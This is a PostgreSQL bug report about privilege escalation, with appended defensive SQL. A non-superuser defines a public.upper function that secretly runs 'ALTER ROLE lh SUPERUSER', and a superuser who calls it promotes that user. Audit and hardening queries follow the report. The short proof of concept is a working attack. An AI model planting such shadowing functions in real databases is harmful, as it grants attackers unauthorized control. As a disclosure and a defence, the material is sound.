From: | PG Bug reporting form <noreply(at)postgresql(dot)org> |
---|---|
To: | pgsql-bugs(at)lists(dot)postgresql(dot)org |
Cc: | abcxiaod(at)126(dot)com |
Subject: | BUG #16448: Remote code execution vulnerability |
Date: | 2020-05-18 09:14:49 |
Message-ID: | 16448-b1ae7a058a160c8e@postgresql.org |
Lists: | pgsql-bugs |
The following bug has been logged on the website:
Bug reference: 16448
Logged by: yi Ding
Email address: abcxiaod(at)126(dot)com
PostgreSQL version: 10.12
Operating system: linux
Description:
A common user created a function in the public space and added some
malicious code to the function. When other users with superuser rights call
this function, the malicious code will be executed, so as to achieve the
purpose of remote malicious code execution.
First, non-superuser lh defines a function named upper, which contains
a statement to modify user permissions.
SQL:
CREATE TABLE public.testlh AS SELECT 'lh'::varchar AS contents;
CREATE FUNCTION public.upper(varchar) RETURNS TEXT AS $$
ALTER ROLE lh SUPERUSER;
SELECT pg_catalog.upper($1);
$$ LANGUAGE SQL VOLATILE;
Second, superuser pg01 will execute the above statement after calling the
upper function, which will change user lh to a superuser.
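
A defender-side check for the situation this report describes, as an added example that is not part of the original message or of PostgreSQL's own documentation: a catalog query that lists functions outside pg_catalog reusing a built-in function name, followed by settings that stop ordinary roles from creating such functions in public. The role names lh and pg01 are the ones used in the report; treating OID 10 as the bootstrap superuser and the chosen search_path value are assumptions to adapt to the installation.

```sql
-- Added example: audit and hardening for look-alike functions in "public".

-- 1. List functions outside pg_catalog that share a name with a pg_catalog
--    function. rolsuper is shown rather than filtered on, because the owner
--    may already have been promoted by the function itself.
SELECT n.nspname  AS schema_name,
       p.proname  AS function_name,
       pg_catalog.pg_get_function_identity_arguments(p.oid) AS arguments,
       r.rolname  AS owner,
       r.rolsuper AS owner_is_superuser_now
FROM pg_catalog.pg_proc AS p
JOIN pg_catalog.pg_namespace AS n ON n.oid = p.pronamespace
JOIN pg_catalog.pg_roles     AS r ON r.oid = p.proowner
WHERE n.nspname NOT IN ('pg_catalog', 'information_schema')
  AND p.proowner <> 10          -- assumption: 10 is the bootstrap superuser
  AND EXISTS (SELECT 1
              FROM pg_catalog.pg_proc AS c
              WHERE c.pronamespace = 'pg_catalog'::pg_catalog.regnamespace
                AND c.proname = p.proname)
ORDER BY schema_name, function_name, arguments;

-- 2. Stop ordinary roles from creating objects in the public schema.
REVOKE CREATE ON SCHEMA public FROM PUBLIC;

-- 3. Keep world-writable schemas out of the privileged role's search path.
--    pg_catalog is still searched implicitly; other objects must then be
--    schema-qualified (public.testlh) by that role.
ALTER ROLE pg01 SET search_path = "$user";

-- 4. Confirm the result for the unprivileged role from the report.
--    Expected: false for a non-superuser once step 2 has been applied.
SELECT pg_catalog.has_schema_privilege('lh', 'public', 'CREATE');
```

Any row returned by step 1 deserves a look at the function body (pg_catalog.pg_get_functiondef) before a privileged role runs queries in that database.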